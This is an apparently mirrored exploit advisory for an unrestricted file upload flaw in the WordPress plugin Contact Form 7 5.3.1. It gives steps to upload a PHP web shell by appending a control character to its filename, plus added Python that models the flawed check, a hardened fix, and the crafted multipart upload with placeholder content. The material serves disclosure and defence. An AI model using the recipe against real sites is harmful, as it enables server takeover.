WordPress Contact Form 7 5.3.1 Shell Upload ≈ Packet Storm – Digitalmunition


Published on December 22nd, 2020



# Exploit Title: WordPress Plugin Contact Form 7 5.3.1 – Unrestricted File Upload
# Date: 12/20/2020
# Exploit Author: Ramón Vila Ferreres (@ramonvfer)
# Vendor Homepage: https://contactform7.com
# Software Link: https://wordpress.org/plugins/contact-form-7/
# Version: 5.3.1 and below
# Tested on: Windows 10 1909, Ubuntu 20.04

Contact Form 7 version 5.3.1 and below does not properly sanitize
uploaded filenames, allowing an unrestricted file upload that can lead
to full server takeover in the worst case.

The flaw is in the wpcf7_antiscript_file_name function, which fails to
sanitize the supplied filename when it ends with any character in the
C0 control range, U+0000 (NUL) through U+001F (Unit Separator).

The function checks both the file name and the file extension against
an exclusion regex that is anchored to the end of the string. Appending
a control character to the extension means the regex no longer matches,
so the blocklisted extension is never recognised and the file is stored
under its original name: an unrestricted file upload.

1. Take the file you want to upload (e.g. "shell.php") and append a
control character to its name (in this case "shell.php" followed by
U+0000).

2. Upload the file through the Contact Form 7 file upload field on the
target website.

3. Request /wp-content/uploads/wpcf7_uploads/shell.php, keeping the
trailing control character in the name.
Note that the upload location is configurable, so it may differ.

4. The file is now on the server under its unsanitized name.
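The following Python is an added example, not the plugin's code and not part of the original advisory. It models the mechanism described above and the upload step: an extension test anchored with `$` that a trailing C0 character slips past, the remedy of stripping Unicode control and separator characters before the test, and the multipart part that carries the crafted name to the server. The exact regex, the form field name `your-file`, the function names and the placeholder file content are illustrative assumptions.

```python
import re
import unicodedata

# Server-executable extensions to neutralise. Illustrative list, not the plugin's own.
UNSAFE_EXTENSION_RE = re.compile(r"^(php|phtml|pl|py|rb|cgi|asp|aspx)$", re.IGNORECASE)

# C0 control character appended in step 1. U+0001 is used here rather than U+0000;
# see the note after the code.
CONTROL_SUFFIX = "\x01"


def _neutralise(filename: str) -> str:
    """Shared tail of both checks: split on '.', test the final part against the
    anchored exclusion regex, and rename blocklisted files to '<name>.<ext>.txt'."""
    parts = filename.split(".")
    if len(parts) < 2:
        return filename
    extension = parts.pop()
    if UNSAFE_EXTENSION_RE.match(extension):
        return ".".join(parts) + "." + extension + ".txt"
    return filename


def vulnerable_antiscript_file_name(filename: str) -> str:
    """Model of the pre-fix behaviour: the extension is tested exactly as supplied.
    'php\\x01' does not satisfy the '$' anchor, so the file keeps its name."""
    return _neutralise(filename)


def hardened_antiscript_file_name(filename: str) -> str:
    """Remedy: drop every Unicode control (category C*) and separator (Z*)
    character before the extension check, so the anchor sees the real extension."""
    cleaned = "".join(ch for ch in filename if unicodedata.category(ch)[0] not in "CZ")
    return _neutralise(cleaned)


def multipart_file_part(field: str, filename: str, content: bytes,
                        boundary: str = "----wpcf7demo") -> bytes:
    """Build the multipart/form-data part a browser would send for step 2. The filename
    is copied verbatim into Content-Disposition, which is how the control character
    reaches the server (latin-1 keeps C0 bytes as single octets)."""
    header = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
    )
    return header.encode("latin-1") + content + f"\r\n--{boundary}--\r\n".encode("ascii")


def demo() -> dict:
    """Run the crafted name through both checks and show it survives the upload body."""
    crafted = "shell.php" + CONTROL_SUFFIX  # step 1
    # Constructed placeholder content; not a working payload.
    body = multipart_file_part("your-file", crafted, b"<?php /* placeholder */ ?>")
    return {
        "plain_vulnerable": vulnerable_antiscript_file_name("shell.php"),
        "crafted_vulnerable": vulnerable_antiscript_file_name(crafted),
        "crafted_hardened": hardened_antiscript_file_name(crafted),
        "control_char_in_body": crafted.encode("latin-1") in body,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Two caveats a practitioner will hit when reproducing step 1 with U+0000 specifically: PHP's filesystem functions reject paths containing a NUL byte, so a name ending in U+0000 will not be written to disk and one of the other C0 characters (legal in Linux filenames) is what actually lands; and whether the stored file is then executed depends on how the web server maps a name that no longer ends in ".php" to the PHP handler. Upgrading past 5.3.1, the last affected version named in the advisory, removes the issue.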
